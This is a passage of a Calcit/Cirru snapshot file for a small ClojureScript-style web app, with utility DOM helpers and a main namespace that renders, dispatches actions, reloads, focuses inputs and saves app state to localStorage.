:data $ {}
|T $ {} (:text |.measureText) (:type :leaf) (:at 1519745621671) (:by |root) (:id |ry2L9lm_M)
|j $ {} (:text |ctx) (:type :leaf) (:at 1519745623339) (:by |root) (:id |BygAL5lQdf)
|r $ {} (:text |text) (:type :leaf) (:at 1519745625374) (:by |root) (:id |BJxDql7_G)
:type :expr
:at 1519745619906
:by |root
:id |Hyl80cxXuG
:type :expr
:at 1519745627368
:by |root
:id |SJzXDqe7uM
:type :expr
:at 1519745567406
:by |root
:id |rkxPQ9e7uz
|j $ {} (:text |0) (:type :leaf) (:at 1519749824597) (:by |root) (:id |H1g_aqWXdG)
:type :expr
:at 1519749815767
:by |root
:id |r1gac-muz
:type :expr
:at 1519745498624
:by |root
:id |SklmyqgQ_G
|*canvas-element $ {}
:data $ {}
|T $ {} (:text |defatom) (:type :leaf) (:at 1629052176809) (:by |Qr5ffqtY) (:id |r1Wu2Ye7uM)
|j $ {} (:text |*canvas-element) (:type :leaf) (:at 1629052396435) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1519745464126) (:by |root) (:id |S1WshKgQOM)
|j $ {}
:data $ {}
|T $ {} (:text |exists?) (:type :leaf) (:at 1519745470340) (:by |root) (:id |HyMeatgQdM)
|j $ {} (:text |js/document) (:type :leaf) (:at 1519745475557) (:by |root) (:id |H1wpte7OM)
:type :expr
:at 1519745465737
:by |root
:id |r1f6tgQdG
|r $ {}
:data $ {}
|j $ {} (:text |js/document.createElement) (:type :leaf) (:at 1629052400733) (:by |Qr5ffqtY) (:id |Hk-CKxQ_G)
|r $ {} (:text ||canvas) (:type :leaf) (:at 1519745487181) (:by |root) (:id |r1zVRFx7Of)
:type :expr
:at 1519745477204
:by |root
:id |rylTTKeXuM
|v $ {} (:text |nil) (:type :leaf) (:at 1519745490070) (:by |root) (:id |S1KAFx7_z)
:type :expr
:at 1519745455887
:by |root
:id |SJ7_2KgQuf
:type :expr
:at 1519745455887
:by |root
:id |BJxdnKxQdM
:proc $ {}
:data $ {}
:type :expr
:at 1519745446524
:by |root
:id |SJmy3Ylm_z
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1519745446524) (:by |root) (:id |S1Wy2Fx7_f)
|j $ {} (:text |app.util.dom) (:type :leaf) (:at 1519745446524) (:by |root) (:id |ryMknFxm_G)
:type :expr
:at 1519745446524
:by |root
:id |rJgyhFg7_f
|app.main $ {}
:defs $ {}
|render-app! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1553789628765) (:by |root) (:id |OOkL9muczUn)
|j $ {} (:text |render-app!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |OyiSFON2oAQ)
|r $ {}
:data $ {}
:type :expr
:at 1553789628765
:by |root
:id |hg-gKCwKW8t
|v $ {}
:data $ {}
|T $ {} (:text |render!) (:type :leaf) (:at 1629052015308) (:by |Qr5ffqtY) (:id |_u9vb1Om0Z6)
|j $ {} (:text |mount-target) (:type :leaf) (:at 1553789628765) (:by |root) (:id |QivxroG-ggJ)
|r $ {}
:data $ {}
|T $ {} (:text |comp-container) (:type :leaf) (:at 1553789628765) (:by |root) (:id |KM-mxAQkonR)
|j $ {} (:text |@*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Yj9v_enUz6C)
:type :expr
:at 1553789628765
:by |root
:id |sV40DQ2RuL8
|v $ {} (:text |dispatch!) (:type :leaf) (:at 1629052210855) (:by |Qr5ffqtY)
:type :expr
:at 1553789628765
:by |root
:id |EXxksWvjXhK
:type :expr
:at 1553789628765
:by |root
:id |Fg3OLzGeX4s
|persist-storage! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1553789628765) (:by |root) (:id |m0tgLhlAc-q)
|j $ {} (:text |persist-storage!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |UyhYxCcyOFV)
|r $ {}
:data $ {}
|D $ {} (:text |?) (:type :leaf) (:at 1629053266824) (:by |Qr5ffqtY)
|T $ {} (:text |e) (:type :leaf) (:at 1629051988969) (:by |Qr5ffqtY)
:type :expr
:at 1553789628765
:by |root
:id |M6Fe_14XHTV
|v $ {}
:data $ {}
|T $ {} (:text |.setItem) (:type :leaf) (:at 1553789628765) (:by |root) (:id |wjxrIDI7ldI)
|j $ {} (:text |js/localStorage) (:type :leaf) (:at 1553789628765) (:by |root) (:id |z4Q2LPzwoa9)
|r $ {}
:data $ {}
|T $ {} (:text |:storage-key) (:type :leaf) (:at 1553789628765) (:by |root) (:id |7lAi8XHD7WK)
|j $ {} (:text |config/site) (:type :leaf) (:at 1553789628765) (:by |root) (:id |sD3s1hx_Fd4)
:type :expr
:at 1553789628765
:by |root
:id |MUB_4A_jfY5
|v $ {}
:data $ {}
|T $ {} (:text |format-cirru-edn) (:type :leaf) (:at 1629051994904) (:by |Qr5ffqtY) (:id |WiTWhwRY6fz)
|j $ {}
:data $ {}
|T $ {} (:text |:store) (:type :leaf) (:at 1553789628765) (:by |root) (:id |d2AxOvJq9WI)
|j $ {} (:text |@*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |7EX3rEXBC2Y)
:type :expr
:at 1553789628765
:by |root
:id |DVLPZU4GxQk
:type :expr
:at 1553789628765
:by |root
:id |YveTv_mtE_I
:type :expr
:at 1553789628765
:by |root
:id |Eul4B3ilfmy
:type :expr
:at 1553789628765
:by |root
:id |VLz3l3DzFWb
|mount-target $ {}
:data $ {}
|T $ {} (:text |def) (:type :leaf) (:at 1553789628765) (:by |root) (:id |gAnOW3uLCSk)
|j $ {} (:text |mount-target) (:type :leaf) (:at 1553789628765) (:by |root) (:id |A7kkjUKwkxd)
|r $ {}
:data $ {}
|T $ {} (:text |.querySelector) (:type :leaf) (:at 1553789628765) (:by |root) (:id |GO8tPh9IySW)
|j $ {} (:text |js/document) (:type :leaf) (:at 1553789628765) (:by |root) (:id |yja00OFnL5Y)
|r $ {} (:text ||.app) (:type :leaf) (:at 1553789628765) (:by |root) (:id |uJkFGVj1nQd)
:type :expr
:at 1553789628765
:by |root
:id |_Y1yPkhDSFY
:type :expr
:at 1553789628765
:by |root
:id |5THUssv_ai0
|*reel $ {}
:data $ {}
|T $ {} (:text |defatom) (:type :leaf) (:at 1629052162285) (:by |Qr5ffqtY) (:id |YH7fhhSwGHR)
|j $ {} (:text |*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |NmVRYvHFZI2)
|r $ {}
:data $ {}
|T $ {} (:text |->) (:type :leaf) (:at 1553789628765) (:by |root) (:id |PprvcQrW6Vw)
|j $ {} (:text |reel-schema/reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Iold4wKlkw1)
|r $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1553789628765) (:by |root) (:id |_PkYSNKnD6D)
|j $ {} (:text |:base) (:type :leaf) (:at 1553789628765) (:by |root) (:id |hiMhJKsDwwz)
|r $ {} (:text |schema/store) (:type :leaf) (:at 1553789628765) (:by |root) (:id |wFIE3MWTMmj)
:type :expr
:at 1553789628765
:by |root
:id |5b3eNPonK2f
|v $ {}
:data $ {}
|T $ {} (:text |assoc) (:type :leaf) (:at 1553789628765) (:by |root) (:id |g2eBr1rCAu7)
|j $ {} (:text |:store) (:type :leaf) (:at 1553789628765) (:by |root) (:id |4bFN65QDphl)
|r $ {} (:text |schema/store) (:type :leaf) (:at 1553789628765) (:by |root) (:id |VfV798N0ROQ)
:type :expr
:at 1553789628765
:by |root
:id |YNdGGCoWGmL
:type :expr
:at 1553789628765
:by |root
:id |DgttNfFZQC2
:type :expr
:at 1553789628765
:by |root
:id |W2DSD-40rmt
|main! $ {}
:data $ {}
|yT $ {}
:data $ {}
|T $ {} (:text |add-watch) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Cco8-iZDzNm)
|j $ {} (:text |*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |hnCakWOy3NT)
|r $ {} (:text |:changes) (:type :leaf) (:at 1553789628765) (:by |root) (:id |uE6fO3LeFTC)
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1553789628765) (:by |root) (:id |zC2U_C4qZnl)
|j $ {}
:data $ {}
|T $ {} (:text |r) (:type :leaf) (:at 1629052021799) (:by |Qr5ffqtY)
|j $ {} (:text |p) (:type :leaf) (:at 1629052022808) (:by |Qr5ffqtY)
:type :expr
:at 1553789628765
:by |root
:id |qV5X6nzksDL
|r $ {}
:data $ {}
|T $ {} (:text |render-app!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |dXNPldZ_i39)
:type :expr
:at 1553789628765
:by |root
:id |agQ4m6P3zh7
:type :expr
:at 1553789628765
:by |root
:id |SdtvVFaGlHI
:type :expr
:at 1553789628765
:by |root
:id |T1LiZE1Gue-
|yb $ {}
:data $ {}
|T $ {} (:text |add-watch) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Cco8-iZDzNm)
|j $ {} (:text |*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |hnCakWOy3NT)
|r $ {} (:text |:focus) (:type :leaf) (:at 1553789666930) (:by |root) (:id |uE6fO3LeFTC)
|v $ {}
:data $ {}
|D $ {} (:text |fn) (:type :leaf) (:at 1629052494253) (:by |Qr5ffqtY)
|L $ {}
:data $ {}
|T $ {} (:text |r) (:type :leaf) (:at 1629052495526) (:by |Qr5ffqtY)
|j $ {} (:text |p) (:type :leaf) (:at 1629052496234) (:by |Qr5ffqtY)
:type :expr
:at 1629052494633
:by |Qr5ffqtY
|T $ {}
:data $ {}
|T $ {} (:text |adjust-focus!) (:type :leaf) (:at 1553789668102) (:by |root) (:id |xxh9QeWZc)
:type :expr
:at 1629052498188
:by |Qr5ffqtY
:type :expr
:at 1629052493454
:by |Qr5ffqtY
:type :expr
:at 1553789628765
:by |root
:id |43zocyc1Q
|yj $ {}
:data $ {}
|T $ {} (:text |listen-devtools!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |rrB1KP_bUbi)
|j $ {} (:text ||k) (:type :leaf) (:at 1629052067782) (:by |Qr5ffqtY) (:id |HWtoZEWn7wa)
|r $ {} (:text |dispatch!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |ErbPpvQyJ8Q)
:type :expr
:at 1553789628765
:by |root
:id |zr0E4UnN-5g
|yr $ {}
:data $ {}
|j $ {} (:text |js/window.addEventListener) (:type :leaf) (:at 1629052065121) (:by |Qr5ffqtY) (:id |b4wFxRV23fz)
|r $ {} (:text ||beforeunload) (:type :leaf) (:at 1553789628765) (:by |root) (:id |SSFmIzjNQh0)
|v $ {} (:text |persist-storage!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |ANc-gEiZl3o)
:type :expr
:at 1553789628765
:by |root
:id |iHgrVUdvKCJ
|yv $ {}
:data $ {}
|T $ {} (:text |repeat!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |YTh7G35d8Ca)
|j $ {} (:text |60) (:type :leaf) (:at 1553789628765) (:by |root) (:id |AXbEK4jQLly)
|r $ {} (:text |persist-storage!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |iGErapEBwEh)
:type :expr
:at 1553789628765
:by |root
:id |ZydaN8HnRBy
|yx $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1553789628765) (:by |root) (:id |PfpURCICGWx)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |raw) (:type :leaf) (:at 1553789628765) (:by |root) (:id |P_2pZqVVeHN)
|j $ {}
:data $ {}
|j $ {} (:text |js/localStorage.getItem) (:type :leaf) (:at 1629052061522) (:by |Qr5ffqtY) (:id |V1PrRBPsWs8)
|r $ {}
:data $ {}
|T $ {} (:text |:storage-key) (:type :leaf) (:at 1553789628765) (:by |root) (:id |arppDuYD87X)
|j $ {} (:text |config/site) (:type :leaf) (:at 1553789628765) (:by |root) (:id |0aYQqm1auSZ)
:type :expr
:at 1553789628765
:by |root
:id |ubtum-G427s
:type :expr
:at 1553789628765
:by |root
:id |yFqaWvvMWae
:type :expr
:at 1553789628765
:by |root
:id |7PlqS6pEHeb
:type :expr
:at 1553789628765
:by |root
:id |jN2-MrEZzaY
|r $ {}
:data $ {}
|T $ {} (:text |when) (:type :leaf) (:at 1553789628765) (:by |root) (:id |VE_sQIR4tNf)
|j $ {}
:data $ {}
|T $ {} (:text |some?) (:type :leaf) (:at 1553789628765) (:by |root) (:id |uDlgCIbfaQv)
|j $ {} (:text |raw) (:type :leaf) (:at 1553789628765) (:by |root) (:id |znWSgxFbALa)
:type :expr
:at 1553789628765
:by |root
:id |hi6jgzs0wTS
|r $ {}
:data $ {}
|T $ {} (:text |dispatch!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |W5TvtcJgEQT)
|j $ {} (:text |:hydrate-storage) (:type :leaf) (:at 1553789628765) (:by |root) (:id |eONnA2rdT6b)
|r $ {}
:data $ {}
|T $ {} (:text |parse-cirru-edn) (:type :leaf) (:at 1629051986316) (:by |Qr5ffqtY) (:id |w_j_HszNgVe)
|j $ {} (:text |raw) (:type :leaf) (:at 1553789628765) (:by |root) (:id |_YXZ2u8TR-h)
:type :expr
:at 1553789628765
:by |root
:id |j8IPUNnEUkf
:type :expr
:at 1553789628765
:by |root
:id |njyenCDUz8t
:type :expr
:at 1553789628765
:by |root
:id |l1P_vAbIjIQ
:type :expr
:at 1553789628765
:by |root
:id |UXMSHeJdZEK
|yy $ {}
:data $ {}
|T $ {} (:text |println) (:type :leaf) (:at 1553789628765) (:by |root) (:id |uxoZt8j4SJa)
|j $ {} (:text "||App started.") (:type :leaf) (:at 1553789628765) (:by |root) (:id |ob4J-eSTVhE)
:type :expr
:at 1553789628765
:by |root
:id |8blf8cFBaL3
|T $ {} (:text |defn) (:type :leaf) (:at 1553789628765) (:by |root) (:id |rcrcfGjALgI)
|j $ {} (:text |main!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |PJLEiWM-5-1)
|r $ {}
:data $ {}
:type :expr
:at 1553789628765
:by |root
:id |ZBt6EodYGxI
|t $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1629052070881) (:by |Qr5ffqtY)
|j $ {} (:text |config/dev?) (:type :leaf) (:at 1629052073387) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |load-console-formatter!) (:type :leaf) (:at 1629052081140) (:by |Qr5ffqtY)
:type :expr
:at 1629052074828
:by |Qr5ffqtY
:type :expr
:at 1629052069673
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |println) (:type :leaf) (:at 1553789628765) (:by |root) (:id |mqfsKyaKmGt)
|j $ {} (:text "|\"Running mode:") (:type :leaf) (:at 1553789628765) (:by |root) (:id |Yz1H39NkRBk)
|r $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1553789628765) (:by |root) (:id |-dau_I-hwPH)
|j $ {} (:text |config/dev?) (:type :leaf) (:at 1553789628765) (:by |root) (:id |lb_Zxx6UZQL)
|r $ {} (:text "|\"dev") (:type :leaf) (:at 1553789628765) (:by |root) (:id |DqM0vzz2Luh)
|v $ {} (:text "|\"release") (:type :leaf) (:at 1553789628765) (:by |root) (:id |nJp9Ommv58O)
:type :expr
:at 1553789628765
:by |root
:id |o5W7V0hP1cA
:type :expr
:at 1553789628765
:by |root
:id |IX5_C0UJhWp
|y $ {}
:data $ {}
|T $ {} (:text |render-app!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |4yH5k1U8noE)
:type :expr
:at 1553789628765
:by |root
:id |wC_rTg9WA3w
:type :expr
:at 1553789628765
:by |root
:id |fEP_UXtZw7M
|dispatch! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1553789628765) (:by |root) (:id |2IFRgl3w0_e)
|j $ {} (:text |dispatch!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |V0065eQRCgU)
|r $ {}
:data $ {}
|T $ {} (:text |op) (:type :leaf) (:at 1553789628765) (:by |root) (:id |M6WIQEobLJe)
|j $ {} (:text |op-data) (:type :leaf) (:at 1553789628765) (:by |root) (:id |ztMpCLD0kHs)
:type :expr
:at 1553789628765
:by |root
:id |IrDxrKel-HU
|v $ {}
:data $ {}
|T $ {} (:text |when) (:type :leaf) (:at 1553789628765) (:by |root) (:id |nua-T3L5OGB)
|j $ {} (:text |config/dev?) (:type :leaf) (:at 1553789628765) (:by |root) (:id |tjjiP10ydAs)
|r $ {}
:data $ {}
|T $ {} (:text |println) (:type :leaf) (:at 1553789628765) (:by |root) (:id |bkaSK9y35S9)
|j $ {} (:text "|\"Dispatch:") (:type :leaf) (:at 1553789628765) (:by |root) (:id |his7HHTrupf)
|r $ {} (:text |op) (:type :leaf) (:at 1553789628765) (:by |root) (:id |IappVBkSRTD)
:type :expr
:at 1553789628765
:by |root
:id |-CEXNY8BL94
:type :expr
:at 1553789628765
:by |root
:id |K6iVO7r9fTk
|x $ {}
:data $ {}
|T $ {} (:text |reset!) (:type :leaf) (:at 1553789628765) (:by |root) (:id |QAIXRa6OtBN)
|j $ {} (:text |*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |M--vL37-uzd)
|r $ {}
:data $ {}
|T $ {} (:text |reel-updater) (:type :leaf) (:at 1553789628765) (:by |root) (:id |0fvPb2Cq4_H)
|j $ {} (:text |updater) (:type :leaf) (:at 1553789628765) (:by |root) (:id |Ho5rYgxv79Z)
|r $ {} (:text |@*reel) (:type :leaf) (:at 1553789628765) (:by |root) (:id |j8qs1m5YmBQ)
|v $ {} (:text |op) (:type :leaf) (:at 1553789628765) (:by |root) (:id |iVkMdIaY5hw)
|x $ {} (:text |op-data) (:type :leaf) (:at 1553789628765) (:by |root) (:id |d4eL3we-H2d)
:type :expr
:at 1553789628765
:by |root
:id |cxEYP0Kpzq4
:type :expr
:at 1553789628765
:by |root
:id |ysm23OGXrrc
:type :expr
:at 1553789628765
:by |root
:id |sXAc7QFqUrB
|reload! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |reload!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |nil?) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |build-errors) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |do) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |remove-watch) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |*reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {} (:text |:changes) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |clear-cache!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |add-watch) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |*reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {} (:text |:changes) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|v $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |prev) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |render-app!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|x $ {}
:data $ {}
|T $ {} (:text |reset!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |*reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |refresh-reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text |@*reel) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {} (:text |schema/store) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|v $ {} (:text |updater) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|y $ {}
:data $ {}
|T $ {} (:text |hud!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text "|\"ok~") (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {} (:text "|\"Ok") (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |hud!) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|j $ {} (:text "|\"error") (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
|r $ {} (:text |build-errors) (:type :leaf) (:at 1629052037213) (:by |Qr5ffqtY)
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
:type :expr
:at 1629052037213
:by |Qr5ffqtY
|repeat! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {} (:text |repeat!) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|r $ {}
:data $ {}
|T $ {} (:text |duration) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {} (:text |cb) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |js/setTimeout) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |cb) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|v $ {}
:data $ {}
|T $ {} (:text |repeat!) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {} (:text |1000) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|r $ {} (:text |duration) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|r $ {} (:text |cb) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
:type :expr
:at 1629051975375
:by |Qr5ffqtY
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|r $ {}
:data $ {}
|T $ {} (:text |*) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|j $ {} (:text |1000) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
|r $ {} (:text |duration) (:type :leaf) (:at 1629051975375) (:by |Qr5ffqtY)
:type :expr
:at 1629051975375
:by |Qr5ffqtY
:type :expr
:at 1629051975375
:by |Qr5ffqtY
:type :expr
:at 1629051975375
:by |Qr5ffqtY
|adjust-focus! $ {}
:data $ {}
|T $ {} (:text |defn) (:type :leaf) (:at 1553789643172) (:by |root) (:id |rO0ZFgdoox)
|j $ {} (:text |adjust-focus!) (:type :leaf) (:at 1553789643172) (:by |root) (:id |woi-Ah4z7Q)
|r $ {}
:data $ {}
:type :expr
:at 1553789643172
:by |root
:id |aTy1lhupuX
|v $ {}
:data $ {}
|T $ {} (:text |js/setTimeout) (:type :leaf) (:at 1553789643172) (:by |root) (:id |Gi9rw6t0eV)
|j $ {}
:data $ {}
|T $ {} (:text |fn) (:type :leaf) (:at 1553789643172) (:by |root) (:id |uy_4aehQsW)
|j $ {}
:data $ {}
:type :expr
:at 1553789643172
:by |root
:id |GLQCOXJcC3
|r $ {}
:data $ {}
|T $ {} (:text |let) (:type :leaf) (:at 1553789643172) (:by |root) (:id |ulsEKYrOVI)
|j $ {}
:data $ {}
|T $ {}
:data $ {}
|T $ {} (:text |pointer) (:type :leaf) (:at 1553789643172) (:by |root) (:id |VF5raFVZNp)
|j $ {}
:data $ {}
|T $ {} (:text |:pointer) (:type :leaf) (:at 1553789643172) (:by |root) (:id |yYfF3YEqpHr)
|j $ {}
:data $ {}
|D $ {} (:text |:store) (:type :leaf) (:at 1553789713923) (:by |root) (:id |v35_rzhE_m)
|T $ {} (:text |@*reel) (:type :leaf) (:at 1553789716026) (:by |root) (:id |eNWr8ofVPuw)
:type :expr
:at 1553789712778
:by |root
:id |YfbPs10J5Y
:type :expr
:at 1553789643172
:by |root
:id |XjilRFuRPDS
:type :expr
:at 1553789643172
:by |root
:id |4A-Po6wZh_
|j $ {}
:data $ {}
|T $ {} (:text |maybe-input) (:type :leaf) (:at 1553789643172) (:by |root) (:id |3B0lUGqfr1Y)
|j $ {}
:data $ {}
|j $ {} (:text |js/document.getElementById) (:type :leaf) (:at 1629052534836) (:by |Qr5ffqtY) (:id |2RR4jv1WIuQ)
|r $ {}
:data $ {}
|T $ {} (:text |str) (:type :leaf) (:at 1553789643172) (:by |root) (:id |4HMNMyXAkRj)
|j $ {} (:text ||input-) (:type :leaf) (:at 1553789643172) (:by |root) (:id |8M-U6T0jvMz)
|r $ {} (:text |pointer) (:type :leaf) (:at 1553789643172) (:by |root) (:id |xuMIDogoH1p)
:type :expr
:at 1553789643172
:by |root
:id |WpvrJYfmF4Y
:type :expr
:at 1553789643172
:by |root
:id |OG_2BTkiLb4
:type :expr
:at 1553789643172
:by |root
:id |TN2O3btTbpv
:type :expr
:at 1553789643172
:by |root
:id |sZpN_iG8RR
|r $ {}
:data $ {}
|T $ {} (:text |;) (:type :leaf) (:at 1553789643172) (:by |root) (:id |XHIePIvpIG9)
|j $ {} (:text |println) (:type :leaf) (:at 1553789643172) (:by |root) (:id |XhPQEcsZGId)
|r $ {} (:text "||Focus to:") (:type :leaf) (:at 1553789643172) (:by |root) (:id |Ou9UA3yhAni)
|v $ {} (:text |pointer) (:type :leaf) (:at 1553789643172) (:by |root) (:id |WXxjEy5mvWn)
|x $ {} (:text |maybe-input) (:type :leaf) (:at 1553789643172) (:by |root) (:id |mhzRIUjnM3n)
:type :expr
:at 1553789643172
:by |root
:id |qGGoK2He06w
|v $ {}
:data $ {}
|T $ {} (:text |if) (:type :leaf) (:at 1553789643172) (:by |root) (:id |6VnkZV2xivs)
|j $ {}
:data $ {}
|T $ {} (:text |and) (:type :leaf) (:at 1553789643172) (:by |root) (:id |h9epZJyM7wH)
|j $ {}
:data $ {}
|T $ {} (:text |some?) (:type :leaf) (:at 1553789643172) (:by |root) (:id |fWSnmxWFTVV)
|j $ {} (:text |maybe-input) (:type :leaf) (:at 1553789643172) (:by |root) (:id |u5QOt8FjaQf)
:type :expr
:at 1553789643172
:by |root
:id |Q4PKdPlk1dr
|r $ {}
:data $ {}
|D $ {} (:text |not) (:type :leaf) (:at 1629052567746) (:by |Qr5ffqtY)
|T $ {}
:data $ {}
|T $ {} (:text |identical?) (:type :leaf) (:at 1629052565027) (:by |Qr5ffqtY) (:id |z5QSGS0bvHf)
|j $ {} (:text |maybe-input) (:type :leaf) (:at 1553789643172) (:by |root) (:id |wSueGrNChwb)
|r $ {}
:data $ {}
|T $ {} (:text |.-activeElement) (:type :leaf) (:at 1553789643172) (:by |root) (:id |gY3Y12PitEy)
|j $ {} (:text |js/document) (:type :leaf) (:at 1553789643172) (:by |root) (:id |XJaclo8Qvxz)
:type :expr
:at 1553789643172
:by |root
:id |dTwjneGkDLi
:type :expr
:at 1553789643172
:by |root
:id |-okkhXPUX4b
:type :expr
:at 1629052566418
:by |Qr5ffqtY
:type :expr
:at 1553789643172
:by |root
:id |DDps48o5grP
|r $ {}
:data $ {}
|T $ {} (:text |.!focus) (:type :leaf) (:at 1629052531333) (:by |Qr5ffqtY) (:id |00-lTJB_dh8)
|j $ {} (:text |maybe-input) (:type :leaf) (:at 1553789643172) (:by |root) (:id |rF1ZX8cG_jh)
:type :expr
:at 1553789643172
:by |root
:id |NKR_PY2JNzY
:type :expr
:at 1553789643172
:by |root
:id |HtX2aNn2b0A
:type :expr
:at 1553789643172
:by |root
:id |A1CzNOqU6E
:type :expr
:at 1553789643172
:by |root
:id |ZM1mgPGPgv
:type :expr
:at 1553789643172
:by |root
:id |o_Xen_1KMv
:type :expr
:at 1553789643172
:by |root
:id |4G6kQnxPTy
:proc $ {}
:data $ {}
:type :expr
:at 1553789628765
:by |root
:id |z_adB3HaSqm
:ns $ {}
:data $ {}
|T $ {} (:text |ns) (:type :leaf) (:at 1553789628765) (:by |root) (:id |bJ0H3tfRrP)
|j $ {} (:text |app.main) (:type :leaf) (:at 1553789628765) (:by |root) (:id |FlKixh6FVm)
|r $ {}
